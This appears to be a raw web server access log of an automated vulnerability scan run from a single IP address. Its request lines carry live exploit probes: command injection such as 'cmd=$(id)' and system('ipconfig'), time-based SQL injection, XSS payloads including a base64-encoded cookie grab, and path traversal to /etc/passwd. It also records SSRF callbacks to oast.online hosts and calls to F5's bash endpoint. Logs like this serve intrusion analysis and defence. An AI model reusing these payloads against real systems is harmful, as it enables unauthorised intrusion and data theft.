"-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19" 154.84.62.234 - - [24/Apr/2025:10:36:45 -0400] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; WOW64; rv:41.0) Gecko/20100101 Firefox/128.0 (x64 de)" 154.84.62.234 - - [24/Apr/2025:10:36:49 -0400] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.4.20" 154.84.62.234 - - [24/Apr/2025:10:36:54 -0400] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_4; en-US) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:36:54 -0400] "GET /wp-content/plugins/import-xml-feed/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:36:57 -0400] "POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:10:37:22 -0400] "POST /app/sys1.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:37:26 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:37:39 -0400] "POST /rpc/clients/xmlrpc HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:38:10 -0400] "POST /cgi-bin/vitogate.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:10:38:30 -0400] "POST /api/jsonrpc HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:38:37 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:10:39:00 -0400] "GET /wp-content/plugins/media-library-assistant/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Whale/3.26.244.21 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:39:05 -0400] "GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php?mla_stream_file=ftp://d04qr7ij4pq19d75k490wt1xi6tuh68f7.oast.online/patrowl.svg HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:40:00 -0400] "GET /chaosblade?cmd=$(id) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/22.0.0 Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:40:07 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18363" 154.84.62.234 - - [24/Apr/2025:10:40:24 -0400] "POST /modules/ndk_steppingpack/search-result.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:40:28 -0400] "POST /modules/ndk_steppingpack/search-result.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (X11; CrOS x86_64 14816.131.5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:40:30 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:40:30 -0400] "GET /api/v1/totp/user-backup-code/../../system/system-information HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.8.19" 154.84.62.234 - - [24/Apr/2025:10:40:34 -0400] "GET /api/v1/cav/client/status/../../admin/options HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:40:34 -0400] "GET /cgi-bin/cstecgi.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:40:43 -0400] "GET /user/login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:10:41:01 -0400] "GET /user/login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.20" 154.84.62.234 - - [24/Apr/2025:10:41:02 -0400] "GET /html/ad/adpesquisasql/request/processVariavel.php?gridValoresPopHidden=echo%20system(\"ipconfig\"); HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 154.84.62.234 - - [24/Apr/2025:10:41:06 -0400] "POST /arrow.flight.protocol.FlightService/DoPut HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.2.17" 154.84.62.234 - - [24/Apr/2025:10:41:24 -0400] "POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:41:29 -0400] "POST /cgi-bin/quick/lgqOUL HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.23" 154.84.62.234 - - [24/Apr/2025:10:42:26 -0400] "GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:10:42:33 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:43:15 -0400] "POST /userentry?accountId=/../../../tomcat/webapps/mcRLW/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.8.22" 154.84.62.234 - - [24/Apr/2025:10:43:17 -0400] "POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.52" 154.84.62.234 - - [24/Apr/2025:10:43:27 -0400] "GET /mcRLW/CVE-2023-47246.txt?true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:43:43 -0400] "GET /index.php?user/login HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 6.2; rv:128.0 ) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:10:44:05 -0400] "GET /uploads/include/dialog/select_media_post_wangEditor.php?filename=1%3Cinput%20onfocus=eval(atob(this.id))%20id=YWxlcnQoZG9jdW1lbnQuY29va2llKTs=%20autofocus%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - KLQOy [24/Apr/2025:10:44:27 -0400] "PATCH /mgmt/tm/auth/user/KLQOy HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:44:33 -0400] "POST /mgmt/shared/authn/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:44:37 -0400] "POST /mgmt/tm/util/bash HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - KLQOy [24/Apr/2025:10:44:41 -0400] "PATCH /mgmt/tm/auth/user/KLQOy HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:10:44:44 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:10:44:47 -0400] "POST /mgmt/shared/authn/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:44:49 -0400] "POST /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:10:44:52 -0400] "POST /mgmt/tm/util/bash HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0" 154.84.62.234 - - [24/Apr/2025:10:44:54 -0400] "GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:45:32 -0400] "GET /tutor/filter?searched_word&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0" 154.84.62.234 - - [24/Apr/2025:10:45:46 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.1 SUSE/6.0.428.0 (KHTML, like Gecko) Chrome/6.0.428.0 Safari/534.1" 154.84.62.234 - - [24/Apr/2025:10:45:58 -0400] "GET /dview8/api/usersByLevel HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 154.84.62.234 - - [24/Apr/2025:10:46:21 -0400] "GET /api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:46:28 -0400] "GET /api/cors/http:%2f%2fnextchat.d04qr7ij4pq19d75k490coykfea8mbrty.oast.online%23 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:46:30 -0400] "POST /partymgr/control/getJSONuiLabel HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:46:30 -0400] "POST /partymgr/control/getJSONuiLabelArray HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 154.84.62.234 - - [24/Apr/2025:10:46:30 -0400] "POST /partymgr/control/getJSONuiLabelArray HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:10:46:30 -0400] "POST /partymgr/control/getJSONuiLabel HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:46:47 -0400] "POST /webtools/control/ProgramExport;/?USERNAME&PASSWORD&requirePasswordChange=Y HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:47:17 -0400] "POST /upload HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:47:54 -0400] "GET /backend/backend/auth/signin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:10:47:58 -0400] "POST /cgi-bin/vitogate.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:10:47:58 -0400] "POST /cgi-bin/vitogate.cgi HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.51" 154.84.62.234 - - [24/Apr/2025:10:49:29 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:49:33 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:49:44 -0400] "POST /api/authentication/login HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:49:54 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:49:54 -0400] "GET /signin HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0" 154.84.62.234 - - [24/Apr/2025:10:49:58 -0400] "GET /admin/index.php?action=ngductung\"><img+src/onerror=\"alert(document.domain) HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:50:24 -0400] "POST /Citrix/teststoreAuth/SamlTest HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:50:29 -0400] "GET /api/clusters HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5) AppleWebKit/618.3.5 (KHTML, like Gecko) Version/17.4 Safari/618.3.5" 154.84.62.234 - - [24/Apr/2025:10:51:16 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686; rv:125.0) Gecko/20100101 Firefox/125.0" 154.84.62.234 - - [24/Apr/2025:10:51:46 -0400] "GET /wp-content/plugins/wp-fastest-cache/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:52:02 -0400] "GET /nodes?view=summary HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:52:28 -0400] "GET /3/ImportFiles?path=%2Fetc%2Fpasswd HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:52:35 -0400] "POST /3/ParseSetup HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.3.18" 154.84.62.234 - - [24/Apr/2025:10:53:01 -0400] "GET /wp-content/plugins/my-calendar/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:53:07 -0400] "GET /tagebuch/eintraege/index.html?reloaded&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0) AppleWebKit/616.3 (KHTML, like Gecko) Version/17.5.22 Safari/616.3" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /lists/elaborate/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /list-editor/index.html?reloaded&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /lists/compact/index.html?reloaded&sort=date_desc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 11) AppleWebKit/616.16 (KHTML, like Gecko) Version/17.0.90 Safari/616.16" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /advanced-elements/form/index.html?formsubmit=12&formaction1=submit&InputField-11939054842=mrs&InputField-21939054842=190806&InputField-31939054842=403105&InputField-41939054842=2&InputField-51939054842&InputField-61939054842=1&captcha_token_id=1\"><script>alert(document.domain)<%2fscript>ufs5prh3qfe&captchaphrase1939054842=1 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.45" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /lists/masonry/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /lists/text-tiles/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:88.0) Gecko/20100101 Firefox/88.0" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /advanced-elements/list/list-filters/index.html?reloaded&sort=date_asc&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /blog/articles/index.html?reloaded&page=2\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /advanced-elements/list/index.html?reloaded&sort=date_asc&page=3\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Debian; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:10:53:09 -0400] "GET /content-elements/job-ad/index.html?reloaded&sort=date_desc&page=1\">%3Cscript%3Ealert(document.domain)%3c%2fscript%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0" 154.84.62.234 - - [24/Apr/2025:10:54:00 -0400] "GET /api/login/unlockGetData HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:54:06 -0400] "POST /api/login/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:54:16 -0400] "POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.127 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:54:22 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.4.21" 154.84.62.234 - - [24/Apr/2025:10:54:27 -0400] "POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:54:35 -0400] "GET /model-versions/get-artifact?path=random&name=FPiMWX&version=2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:10:54:47 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:56:04 -0400] "GET /wp-json/lp/v1/courses/archive-course?order_by=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))X)&limit=-1 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:56:36 -0400] "GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:56:48 -0400] "POST /api/2.0/mlflow/users/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:58:17 -0400] "GET /index.php?rest_route=%2Fessential-blocks%2Fv1%2Fproducts&is_frontend=true&attributes={\"__file\":\"/etc%2fpasswd\"} HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_1_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:58:24 -0400] "GET /wp-content/plugins/essential-blocks/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:58:29 -0400] "GET /wp-json/lp/v1/load_content_via_ajax/?callback={\"class\"%3a\"LP_Debug\",\"method\"%3a\"var_dump\"}&args=\"2w9rfW9vynFAV4ZGFbYfh7u9QlT\" HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:10:58:40 -0400] "POST /php/ping.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_17) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:58:40 -0400] "POST /php/ping.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:10:59:07 -0400] "PUT /api/2.0/mlflow-artifacts/artifacts/2w9rfWwI05kqfqQpChkcb37Z9E7 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 154.84.62.234 - - [24/Apr/2025:10:59:12 -0400] "DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18" 154.84.62.234 - - [24/Apr/2025:10:59:53 -0400] "POST /ajax-api/2.0/mlflow/experiments/create HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:11:00:09 -0400] "POST /wp-json/post-smtp/v1/connect-app HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - 